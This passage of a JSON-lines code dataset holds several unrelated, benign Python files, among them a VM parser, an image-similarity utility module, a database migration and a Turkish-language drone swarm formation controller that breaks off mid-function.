\"update_time\":now_str,\n \"typestandard_code\": \"601\", \"typestandard_name\": \"按投资策略分类\", \"type_code\": \"60108\", \"type_name\": \"多策略\",\n \"index_method\": \"1\", \"data_source\":\"0\", \"data_source_name\":\"私募云通\",\n \"index_value\": str(result[i]), \"funds_number\": str(values_num[i])\n }\n datas.append(res_tmp)\n\nfields = \"\"\nfor field in datas[0].keys():\n fields += \",%s\"%(field)\nfields = fields[1:]\n\npl_result = pl.copy()\npl_result[\"result\"] = str({\"db_name\":\"base\",\n \"table_name\":\"fund_month_index\",\n \"param_fields\":fields,\n \"update_fields\":fields,\n \"datas\": datas\n })\nr = s.post(url_result, pl_result)\nprint(\"result_api:\\n%s\" % r.text)\n\npl_status = pl.copy()\npl_status[\"status\"] = \"EXEC_SUCCESS\"\nr = s.post(url_status, pl_status)\nprint(\"status_api:\\n%s\" % r.text)\n\n","sub_path":"Scripts/Others/DEPRECATED/m/fund_index_12_m.py","file_name":"fund_index_12_m.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"153309799","text":"import re\n\nclass Parser:\n\tdef __init__(self, path):\n\t\tself.C_ARITHMETIC = 'C_ARITHMETIC'\n\t\tself.C_PUSH = 'C_PUSH'\n\t\tself.C_POP = 'C_POP'\n\t\tself.C_LABEL = 'C_LABEL'\n\t\tself.C_GOTO = 'C_GOTO'\n\t\tself.C_IF = 'C_IF'\n\t\tself.C_FUNCTION = 'C_FUNCTION'\n\t\tself.C_RETURN = 'C_RETURN'\n\t\tself.C_CALL = 'C_CALL'\n\n\t\tself._CMD_DICT = {\n\t\t\t'push': self.C_PUSH,\n\t\t\t'pop': self.C_POP,\n\t\t\t'label': self.C_LABEL,\n\t\t\t'goto': self.C_GOTO,\n\t\t\t'if-goto': self.C_IF,\n\t\t\t'function': self.C_FUNCTION,\n\t\t\t'return': self.C_RETURN,\n\t\t\t'call': self.C_CALL,\n\t\t\t'add': self.C_ARITHMETIC,\n\t\t\t'sub': self.C_ARITHMETIC,\n\t\t\t'neg': self.C_ARITHMETIC,\n\t\t\t'eq': self.C_ARITHMETIC,\n\t\t\t'gt': self.C_ARITHMETIC,\n\t\t\t'lt': self.C_ARITHMETIC,\n\t\t\t'and': self.C_ARITHMETIC,\n\t\t\t'or': self.C_ARITHMETIC,\n\t\t\t'not': self.C_ARITHMETIC\n\t\t}\n\n\t\tself._lines = []\n\t\tself._current_line = 0\n\n\t\tfile = open(path, 'r')\n\t\tlines = file.read().split('\\n')\n\t\tfor line in lines:\n\t\t\tline = line.replace('\\r', '')\n\t\t\tstripped = self._strip_line(line)\n\t\t\tif len(stripped) > 0:\n\t\t\t\tself._lines.append(stripped)\n\n\t\tself.reset()\n\n\tdef reset(self):\n\t\tself._current_line = 0\n\t\tif len(self._lines) > self._current_line:\n\t\t\tself._next_command = self._lines[self._current_line]\n\t\telse:\n\t\t\tself._next_command = None\n\n\tdef hasMoreCommands(self):\n\t\treturn self._next_command is not None\n\n\tdef advance(self):\n\t\tif self._next_command is not None:\n\t\t\tself._current_command = self._next_command\n\n\t\t\tif len(self._lines) > self._current_line + 1:\n\t\t\t\tself._next_command = self._lines[self._current_line + 1]\n\t\t\telse:\n\t\t\t\tself._next_command = None\n\t\t\tself._current_line += 1\n\n\tdef commandType(self):\n\t\tcommand = self._getArg(0)\n\t\t\t\n\t\tif command in self._CMD_DICT:\n\t\t\treturn self._CMD_DICT[command]\n\t\traise Exception(\"Invalid command\")\n\n\tdef command(self):\n\t\treturn self._getArg(0)\n\n\tdef arg1(self):\n\t\treturn self._getArg(1)\n\t\t\t\n\tdef arg2(self):\n\t\treturn self._getArg(2)\n\n\tdef _getArg(self, ind):\n\t\tcmd = self._current_command\n\t\tfields = cmd.split(' ')\n\t\tif len(fields) < ind + 1:\n\t\t\treturn None\n\t\treturn fields[ind]\n\n\tdef _strip_line(self, line):\n\t\tstripped = re.sub('//.*$', '', line)\n\t\treturn stripped.strip().replace('\\r', '')","sub_path":"projects/07/VM/VM/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440461325","text":"import PyPDF2\nfrom PyPDF2 import PdfFileReader\n\nimport pandas as pd\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom nltk import FreqDist\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n\nimport spacy\nfrom spacy.lang.es import Spanish\nfrom spacy.lang.es.stop_words import STOP_WORDS\n\nimport sklearn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport string\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nquestion = [str(input(\"¿Que quieres de España?: \"))]\n\ndef extract_pdf(paths):\n all_parties = []\n for path in paths:\n party_pdf = open(path, mode='rb')\n party = PyPDF2.PdfFileReader(party_pdf)\n pages = party.getNumPages()\n all_text = []\n for page in range(pages):\n info = party.getPage(page)\n text = info.extractText()\n text_clean = re.sub('\\n', '', text)\n text_clean = re.sub(\"˜\", \"fi\", text_clean)\n text_clean = re.sub(\"-\", \"\", text_clean)\n # text_clean=re.sub(\"á\", \"a\", text_clean)\n # text_clean=re.sub(\"é\", \"e\", text_clean)\n # text_clean=re.sub(\"í\", \"i\", text_clean)\n # text_clean=re.sub(\"ó\", \"o\", text_clean)\n # text_clean=re.sub(\"ú\", \"u\", text_clean)\n all_text.append(text_clean)\n all_parties.append(str(all_text))\n\n return all_parties\n\ndef spacy_tokenizer(sentence):\n nlp=spacy.load('es')\n parser = Spanish()\n spacy_stopwords = spacy.lang.es.stop_words.STOP_WORDS\n STOPWORDS=list(spacy_stopwords)\n STOPWORDS.extend(('y','a','u','o','e'))\n tokens = parser(sentence)\n filtered_tokens = []\n for word in tokens:\n lemma = word.lemma_.lower().strip()\n lemma=re.sub(\"á\", \"a\", lemma)\n lemma=re.sub(\"é\", \"e\", lemma)\n lemma=re.sub(\"í\", \"i\", lemma)\n lemma=re.sub(\"ó\", \"o\", lemma)\n lemma=re.sub(\"ú\", \"u\", lemma)\n lemma=re.sub(\"ñ\", \"n\", lemma)\n if lemma not in STOPWORDS and re.search('^[a-zA-Z]+$', lemma):\n filtered_tokens.append(lemma)\n return filtered_tokens\n\n\ndef tfdif_vect(parties, text):\n tfidf_vectorizer = TfidfVectorizer(tokenizer=spacy_tokenizer)\n tfidf_matrix = tfidf_vectorizer.fit_transform(parties)\n text_transformed=tfidf_vectorizer.transform(text)\n return cosine_similarity(tfidf_matrix, text_transformed)\n\ndef plot_result(result):\n df = pd.DataFrame(result, index=party_names)\n df.plot(kind='bar', colors = 'mrybg')\n plt.title('Recomendación de Voto')\n plt.xlabel('Partidos')\n plt.ylabel('Similaridad')\n return plt.show()\n\n\n\nparty_names=['Podemos','PSOE','Ciudadanos', 'PP','Vox']\npath_list=['data/podemos.pdf','data/psoe.pdf','data/ciudadanos.pdf','data/pp.pdf','data/vox.pdf']\nparties=extract_pdf(path_list)\nsimilarities=tfdif_vect(parties, question)\nplot_result(similarities)\n","sub_path":"saved tuesday version.py","file_name":"saved tuesday version.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91452292","text":"# pylint: disable=duplicate-code\n\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any, Sequence, cast\n\nimport joblib\nimport numpy as np\nfrom attrs import define\nfrom sklearn.base import BaseEstimator\n\nimport skrough.typing as rght\nfrom skrough.algorithms.constants import RNG_INTEGERS_PARAM\nfrom skrough.algorithms.meta.aggregates import UpdateStateHooksAggregate\nfrom skrough.algorithms.meta.describe import (\n autogenerate_description_node,\n describe,\n inspect_config_keys,\n inspect_input_data_keys,\n inspect_values_keys,\n)\nfrom skrough.algorithms.meta.helpers import normalize_sequence\nfrom skrough.algorithms.meta.stage import Stage\nfrom skrough.algorithms.meta.visual_block import sk_visual_block\nfrom skrough.logs import log_start_end\nfrom skrough.structs.description_node import NODE_META_OPTIONAL_KEY\nfrom skrough.structs.state import ProcessingState, StateConfig, StateInputData\n\nlogger = logging.getLogger(__name__)\n\n\n@define\nclass ProcessingMultiStage(rght.Describable):\n init_multi_stage_agg: UpdateStateHooksAggregate\n init_agg: UpdateStateHooksAggregate\n stages: Sequence[Stage]\n finalize_agg: UpdateStateHooksAggregate\n prepare_result_fun: rght.PrepareResultFunction\n\n # pylint: disable-next=protected-access\n _repr_mimebundle_ = BaseEstimator._repr_mimebundle_\n _sk_visual_block_ = sk_visual_block\n\n @classmethod\n @log_start_end(logger)\n def from_hooks(\n cls,\n prepare_result_fun: rght.PrepareResultFunction,\n init_multi_stage_hooks: None\n | (rght.OneOrSequence[rght.UpdateStateHook]) = None,\n init_hooks: rght.OneOrSequence[rght.UpdateStateHook] | None = None,\n stages: rght.OneOrSequence[Stage] | None = None,\n finalize_hooks: rght.OneOrSequence[rght.UpdateStateHook] | None = None,\n ):\n return cls(\n init_multi_stage_agg=UpdateStateHooksAggregate.from_hooks(\n init_multi_stage_hooks\n ),\n init_agg=UpdateStateHooksAggregate.from_hooks(init_hooks),\n stages=normalize_sequence(stages, optional=True),\n finalize_agg=UpdateStateHooksAggregate.from_hooks(finalize_hooks),\n prepare_result_fun=prepare_result_fun,\n )\n\n @log_start_end(logger)\n def __call__(\n self,\n state: ProcessingState | None = None,\n input_data: StateInputData | None = None,\n config: StateConfig | None = None,\n seed: rght.Seed = None,\n ) -> Any:\n logger.debug(\"Create state object\")\n if state is None:\n logger.debug(\"No state passed, create new one from config, input and seed\")\n state = ProcessingState.from_optional(\n rng=np.random.default_rng(seed),\n processing_fun=self,\n config=config,\n input_data=input_data,\n )\n logger.debug(\"Run init state hooks\")\n self.init_multi_stage_agg(state)\n\n logger.debug(\"Run init hooks\")\n self.init_agg(state)\n\n logger.debug(\"Run stages sequentially\")\n for i, stage in enumerate(self.stages):\n logger.debug(\"Run stage %d\", i)\n stage(state)\n\n logger.debug(\"Run finalize hooks\")\n self.finalize_agg(state)\n\n logger.debug(\"Prepare result function\")\n result = self.prepare_result_fun(state)\n return result\n\n @log_start_end(logger)\n def call_parallel(\n self,\n n_times: int,\n state: ProcessingState | None = None,\n input_data: StateInputData | None = None,\n config: StateConfig | None = None,\n seed: rght.Seed = None,\n n_jobs: int | None = None,\n ) -> list[Any]:\n rng = np.random.default_rng(seed)\n result = joblib.Parallel(n_jobs=n_jobs)(\n joblib.delayed(self)(\n state=state,\n input_data=input_data,\n config=config,\n seed=rng.integers(RNG_INTEGERS_PARAM),\n )\n for _ in range(n_times)\n )\n return cast(list[Any], result)\n\n def get_description_graph(self):\n result = autogenerate_description_node(\n processing_element=self, process_docstring=True\n )\n result.children = [\n describe(\n self.init_multi_stage_agg,\n override_node_name=\"init_multi_stage\",\n override_node_meta={NODE_META_OPTIONAL_KEY: True},\n ),\n describe(\n self.init_agg,\n override_node_name=\"init\",\n ),\n describe(\n self.stages,\n override_node_name=\"stages\",\n ),\n describe(\n self.finalize_agg,\n override_node_name=\"finalize\",\n ),\n describe(\n self.prepare_result_fun,\n override_node_name=\"prepare_result\",\n ),\n ]\n return result\n\n def _get_children_processing_elements(self):\n return [\n self.init_multi_stage_agg,\n self.init_agg,\n *self.stages,\n self.finalize_agg,\n self.prepare_result_fun,\n ]\n\n def get_config_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_config_keys,\n )\n\n def get_input_data_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_input_data_keys,\n )\n\n def get_values_keys(self) -> list[str]:\n return self._get_keys_from_elements(\n children=self._get_children_processing_elements(),\n inspect_keys_function=inspect_values_keys,\n )\n","sub_path":"src/skrough/algorithms/meta/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522405166","text":"#!/usr/bin/env python\n\n# light every nth LED. adjust n.\n\nimport opc, time\n\nnumLEDs = 512\nstep = 1\nsleep=0.15\nmaxn = 50\na=1\nb=maxn\nrlum=1\nglum=1\nblum=1\n\nclient = opc.Client('localhost:7890')\n\nwhile True:\n\tfor n in range(a,b,step):\n\t\tpixels = [ (0,0,0) ] * numLEDs\n\t\tfor i in range(numLEDs):\n\t\t\tx=i%n\n\t\t\tpix=255-(x*(255/maxn))\n\t\t\tpixels[i] = (pix*rlum,pix*glum,pix*blum)\n\t\tclient.put_pixels(pixels)\n\t\ttime.sleep(sleep)\n\n\tstep *= -1\n\tc=a\n\ta=b\n\tb=c\n","sub_path":"fadecandy/examples/python/skip.py","file_name":"skip.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345726082","text":"import sys\n\nfrom setuptools import find_packages, setup\n\nassert sys.version_info >= (3, 3), \"python >= 3.3 required\"\n\n\n# with open('requirements.txt') as requirements:\n# requires = requirements.read().splitlines()\n\nrequires = [\n 'arrow',\n 'pycommon>=0.5',\n 'numpy'\n]\n\nsetup(name='stockjournal',\n version=\"1.0\",\n description='stock calculator',\n author='Robert Zaremba',\n author_email='robert.zaremba@scale-it.pl',\n packages=find_packages(exclude=['test', 'test.*', 'build.*']),\n install_requires=requires,\n tests_require=['pytest'],\n dependency_links=['git+https://github.com/robert-zaremba/py-common.git#egg=pycommon-0.5'],\n entry_points={\n 'console_scripts': [\n # 'name = pkg.path:main',\n ]},\n classifiers=[\n 'Environment :: Console',\n 'Operating System :: OS Independent',\n\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3 :: Only'])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211766433","text":"import cv2\nimport numpy as np\n\n'''Collection of various utility functions.'''\n\ndef rotate_image(image=None, angle=0, w=-1, h=-1):\n\t'''\n\tRotate image by angle without cutting.\n\tAlso used to calculate bounding box dimensions for rotation.\n\n\tArgs:\n\t\timage: image to transform (otherwise, only calculates bounding box)\n\t\tangle: counter-clockwise angle of rotation in degrees\n\t\t\tw: virtual width, if 'image' is not specified\n\t\t\th: virutal height, if 'image' is not specified\n\n\tReturns:\n\t\tif 'image' is None: bounding box dimensions\n\t\t\t\t otherwise: rotated image\n\t'''\n\n\tif image is not None:\n\t\t# determine dimensions, get center\n\t\t(h, w) = image.shape[:2]\n\t(cW, cH) = (w // 2, h // 2)\n\n\t# calculate sin and cos of rotation\n\tR = cv2.getRotationMatrix2D((cW, cH), angle, 1.0)\n\tcos_R = np.abs(R[0, 0])\n\tsin_R = np.abs(R[0, 1])\n\n\t# compute bounding box dimensions\n\tnW = int((h * sin_R) + (w * cos_R))\n\tnH = int((h * cos_R) + (w * sin_R))\n\tres = (nW, nH)\n\n\tif image is not None:\n\t\t# adjust rotation matrix to take into account translation\n\t\tR[0, 2] += (nW / 2) - cW\n\t\tR[1, 2] += (nH / 2) - cH\n\n\t\t# perform actual rotation and return image\n\t\tres = cv2.warpAffine(image, R, (nW, nH))\n\treturn res\n\n\ndef pair_pixels(img_shape, num_pairs):\n\t'''\n\tConstruct a set of random pixel pairs (from gaussian distribution).\n\tUsed to calculate BRIEF descriptor.\n\n\tArgs:\n\t\timg_shape: dimensions of the image to construct pixel pairs for\n\t\tnum_pairs: number of pixel pairs to construct\n\n\tReturns x-coordinates and y-coordinates of paired pixels.\n\t'''\n\tdim_x, dim_y = img_shape[1], img_shape[0]\n\tx = np.sqrt(dim_x-1) * np.random.randn(num_pairs, 2) + (dim_x-1)/2\n\tx = np.clip(x, 0, dim_x-2).astype(\"int\")\n\n\ty = np.sqrt(dim_y-1) * np.random.randn(num_pairs, 2) + (dim_y-1)/2\n\ty = np.clip(y, 0, dim_y-2).astype(\"int\")\n\treturn x,y\n\n\ndef brief_encode(img, x, y):\n\t'''\n\tCalculate multi-channel BRIEF descriptor for an image.\n\tArgs:\n\t\timg: image to calculate descriptor for\n\t\tx: x-coordinates of pixel pairs [from pair_pixels()]\n\t\ty: y-coordinates of pixel pairs [from pair_pixels()]\n\tReturn multi-channel BRIEF descriptor for the image.\n\t'''\n\n\t# construct BRIEF descriptor for each channel\n\tchannel_descriptors = []\n\tfor c in range(img.shape[2]):\n\t\tdescriptor = (img[y[:,0], x[:,0], c] > img[y[:,1], x[:,1], c]).astype(\"uint8\")\n\t\tchannel_descriptors.append(descriptor)\n\n\t# connect channel descriptors\n\tchannel_descriptors = np.array(channel_descriptors)\n\tfull_descriptor = np.concatenate(channel_descriptors[:])\n\treturn full_descriptor\n\n\ndef calc_weight_brief(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight (from ParticleFilter) using BRIEF descriptors.\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\tx, y = pair_pixels(camera_prediction.shape, 64)\n\tcamera_descriptor = brief_encode(camera_prediction, x, y)\n\tparticle_descriptor = brief_encode(particle_prediction, x, y)\n\n\txnor = (camera_descriptor[:] == particle_descriptor[:]).astype(\"uint8\")\n\tweight = np.sum(xnor)/len(xnor)\n\treturn weight\n\n\ndef calc_weight_obj(camera_prediction, particle_prediction):\n\tchannels = camera_prediction.shape[2]\n\tcamera_sum, particle_sum = np.sum(camera_prediction), np.sum(particle_prediction)\n\ttotal_obj_ratio = max(camera_sum/particle_sum, particle_sum/camera_sum)\n\t\n\tclass_totals_camera = np.array([np.sum(camera_prediction[:,:,c]) for c in range(channels)])\n\tclass_totals_camera /= camera_sum\n\t\n\tclass_totals_particle = np.array([np.sum(particle_prediction[:,:,c]) for c in range(channels)])\n\tclass_totals_particle /= particle_sum\n\n\terror = np.sum(np.abs(class_totals_camera - class_totals_particle)) * np.log(total_obj_ratio)\n\tweight = 1/(error+1)\n\treturn weight\n\n\ndef calc_weight_cossim(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight by constructing vectors of class certainty sums\n\tand applying Error Sum of Squares.\n\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\n\tchannels = camera_prediction.shape[2]\n\n\tcamera_prediction[camera_prediction < 1/channels] = 0\n\tparticle_prediction[particle_prediction < 1/channels] = 0\n\n\tclass_sums_camera = [np.sum(camera_prediction[:,:,c]) for c in range(channels)]\n\tclass_sums_particle = [np.sum(particle_prediction[:,:,c]) for c in range(channels)]\n\n\tcam_norm = np.linalg.norm(class_sums_camera)\n\tparticle_norm = np.linalg.norm(class_sums_particle)\n\n\tweight = np.dot(class_sums_camera, class_sums_particle) / (cam_norm*particle_norm)\n\treturn weight\n\n\ndef calc_weight_sse(camera_prediction, particle_prediction):\n\t'''\n\tCalculate particle weight by constructing vectors of class certainty sums\n\tand applying Error Sum of Squares.\n\n\tArgs:\n\t\t camera_prediction: prediction tensor for the camera image\n\t\tparticle_prediction: prediction tensor for the particle area\n\tReturns particle weight.\n\t'''\n\n\tchannels = camera_prediction.shape[2]\n\n\tcamera_prediction[camera_prediction < 1/channels] = 0\n\tparticle_prediction[particle_prediction < 1/channels] = 0\n\n\tclass_sums_camera = np.array([np.sum(camera_prediction[:,:,c]) for c in range(channels)])\n\tclass_sums_particle = np.array([np.sum(particle_prediction[:,:,c]) for c in range(channels)])\n\n\tsum_squared_errors = np.sum(np.square(class_sums_camera - class_sums_particle))\n\n\tweight = 1/(sum_squared_errors+1)\n\treturn weight","sub_path":"source/Utility.py","file_name":"Utility.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540951395","text":"##Lets try multi threading with python\nfrom threading import Thread\nimport PyClassInherit\nimport time\n\ndef junkie(tid):\n i=10\n log_obj=PyClassInherit.synced_logger(\"INFO\",\"multi_threading.txt\")\n while i>=0:\n msg=str(tid)+\" -- Iteration: \"+str(i)\n log_obj.log_it(str(msg))\n time.sleep(5)\n i-=1\n \n \n##MAIN##\ntask_list=[]\nfor i in [1,2]:\n task=Thread(target=junkie, args=(i,))\n print(task)\n task_list.append(task)\n task.start()\n \nfor task_ in task_list:\n task_.join()\n \n##Next Up Dealing with classes having run method","sub_path":"Multithreading.py","file_name":"Multithreading.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633193101","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\n\nfrom models import connect_db\nfrom utils import clean_item\n\n\ndef upload_to_db(file_name):\n \"\"\"Parse json lines file and save in database if needed.\"\"\"\n with open(file_name, \"r\") as handle:\n data = [\n json.loads(i)\n for i in handle.readlines()\n ]\n db = connect_db()\n table = db['papeletas']\n\n papeletas_in_db = get_papeletas(table)\n papeletas_in_file = [i['papeleta'] for i in data]\n\n papeletas_to_insert = set(papeletas_in_file) - set(papeletas_in_db)\n items_to_insert = [\n item\n for item in data\n if item['papeleta'] in papeletas_to_insert\n ]\n\n cleaned_items = [\n clean_item(item)\n for item in items_to_insert\n ]\n table.insert_many(cleaned_items)\n\n\ndef get_papeletas(table):\n return [i['papeleta'] for i in table.all()]\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Analyze fines\")\n parser.add_argument(\n '-i',\n '--input',\n dest='input_file',\n action='store',\n help='JsonLines file with scraped data',\n required=True,\n )\n args = parser.parse_args()\n upload_to_db(args.input_file)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"upload_scraped_data_to_db.py","file_name":"upload_scraped_data_to_db.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324847983","text":"\"\"\"empty message\n\nRevision ID: 0138f3a43814\nRevises: None\nCreate Date: 2019-06-19 10:12:26.439959\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0138f3a43814'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('movie',\n sa.Column('key', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=300), nullable=True),\n sa.Column('director', sa.String(length=300), nullable=True),\n sa.Column('date', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n op.create_table('rate',\n sa.Column('user_rating', sa.Integer(), nullable=False),\n sa.Column('movie_rated', sa.Integer(), nullable=False),\n sa.Column('rating', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('user_rating', 'movie_rated')\n )\n op.create_table('user',\n sa.Column('key', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=300), nullable=True),\n sa.Column('last_name', sa.String(length=300), nullable=True),\n sa.Column('age', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user')\n op.drop_table('rate')\n op.drop_table('movie')\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/0138f3a43814_.py","file_name":"0138f3a43814_.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"312417832","text":"import numpy as np\nfrom pycrazyswarm import *\nfrom sub_functions import *\nfrom formations import *\nfrom swarm_class import *\nimport random\n\n\n\n\nprint(\"\"\"\n---- Çoban-Z Sürü Drone Algoritmaları Kumanda Modülü ----\n---------------------------------------------------------\nDikkat !! Her formasyon için minimum bir drone sayısı vardır \n\nÜçgen --> 3 \nKare --> 4 \nV --> 5\nBeşgen --> 5\nHilal --> 6\nYıldız --> 10\n\n\"\"\")\n \ndrone_number = int(input(\"Lütfen kaç drone ile başlamak istediğinizi giriniz : \"))\nprint(\"------------------------------------------------\")\nprint(\"------------------------------------------------\")\ntake_off_type = int(input(\"\"\"Dronların eşzamanlı kaldırılmasını istiyorsanız --> 1 \nTeker teker kalkmalarını istiyorsanız --> 2 : \n\"\"\"))\nhight = float(input(\"kaç metre yüksekliğe çıkılsın : \"))\ndistance = float(input(\"elemanlar arasındaki mesafeyi giriniz : \"))\n\nswarm = Crazyswarm()\ntimeHelper = swarm.timeHelper\nallcfs = swarm.allcfs\nswarm.allcfs.takeoff(0,0)\ncrazyflies = allcfs.crazyflies[0:drone_number]\nswarm2 = Swarm(crazyflies,timeHelper,allcfs)\n\nif take_off_type == 1 :\n swarm2.takeoff_ascyn(hight, 5)\nelif take_off_type == 2:\n swarm2.takeoff_scyn(hight, 5)\nelse :\n print(\"hatalı giris yaptiniz\")\n\n\n\nif drone_number == 3:\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\nelif drone_number ==4 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\nelif drone_number ==5 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\nelif drone_number == 6 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n \nelif drone_number > 6 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n print(\"6 --> Yıldız fprmasyonu\")\n\n \nformation_id = int(input(\"formasyon numarasını giriniz : \"))\n\n\nif formation_id == 1:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 2:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 3:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 4:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 5:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 6:\n swarm2.take_formation(distance,formation_id,hight,0,0)\nelif formation_id == 7:\n swarm2.take_formation(distance,formation_id,hight,0,0)\n\ncur_x = 0\ncur_y = 0\n\nwhile True :\n print(\"\"\"Formasyonu güncellemek için --> 1\nYükselme veya Alçalma için --> 2 \nRotasyon yaptırmak için --> 3\nNavigasyon yaptırmak için --> 4\nSürü ayrılması için --> 5\nDönerek Navigasyon için --> 6\nSıralı iniş için --> 7\n\"\"\")\n selection = int(input(\"seçiminiz : \"))\n if selection == 1 :\n print(\"\"\" eleman eklemek için --> 1\n eleman çıkarmak için --> 2\n elamanlar arası mesafeyi güncellemek için --> 3\n formasyon değiştirmek için --> 4\n kare formasyonundayken eleman ekleme için --> 5\n \"\"\")\n selection2 = int(input(\"seçiminiz : \"))\n\n if selection2 == 1 :\n swarm2.add_crazyflie(allcfs.crazyflies[drone_number])\n timeHelper.sleep(5)\n drone_number +=1\n swarm2.take_formation(distance,formation_id,hight,cur_x,cur_y)\n elif selection2 == 2 :\n rastgele = random.randint(0,drone_number-1)\n print(\"rastgele eleman çıkarılıyor ...\")\n swarm2.remove_crazyflie(swarm2.crazyflies[rastgele])\n drone_number = drone_number -1 \n swarm2.take_formation(distance,formation_id,hight,cur_x,cur_y)\n elif selection2 == 3 :\n aralık = int(input(\"elemanlar arasındaki istediğiniz mesafeyi giriniz : \"))\n distance = aralık\n swarm2.take_formation(aralık,formation_id,hight,cur_x,cur_y)\n elif selection2 == 4 :\n print(\"seçebileceğiniz formasyonlar : \")\n print(\"1 --> Üçgen \")\n print(\"2 --> Kare \")\n print(\"3 --> V formasyonu \")\n print(\"4 --> Beşgen formasyonu \")\n print(\"5 --> Hilal formasyonu \")\n print(\"6 --> Yıldız formasyonu\")\n print(\"7 --> Daire formasyonu\")\n\n selection3 = int(input(\"seçiminiz : \"))\n formation_id = selection3\n swarm2.change_formation(selection3,distance,cur_x,cur_y)\n \n elif selection == 2 :\n vertical_move = float(input(\"Sürüyü hangi yüksekliğe hareket ettirmek istersiniz : \"))\n swarm2.takeoff_ascyn(vertical_move, 5)\n hight = vertical_move \n\n elif selection == 3 :\n rot = int(input(\"kac derece rotasyon yaptırmak istiyorsunuz : \"))\n print(cur_x)\n print(cur_y)\n swarm2.rotasyon_3(rot,cur_x, cur_y, hight,distance)\n \n\n elif selection == 4 :\n x = float(input(\"navigasyon yapmak istediğiniz noktanın x kordinatını giriniz : \" ))\n y = float(input(\"navigasyon yapmak istediğiniz noktanın y kordinatını giriniz : \" ))\n swarm2.navigation_2([x,y,hight],10)\n cur_x = x \n cur_y = y\n \n elif selection == 5 :\n print(\"sürü ayrılması yapmak için minimum 6 iha bulunmalıdır \")\n if drone_number > 5 :\n print(\"test için bir üçgen ve istediğimiz başka bir formasyon : \")\n sep_swarm = int(input(\"lütfen istediğiniz diğer formasyonu giriniz \"))\n crazyflies_1 = allcfs.crazyflies[0:3]\n crazyflies_2= allcfs.crazyflies[3:drone_number]\n 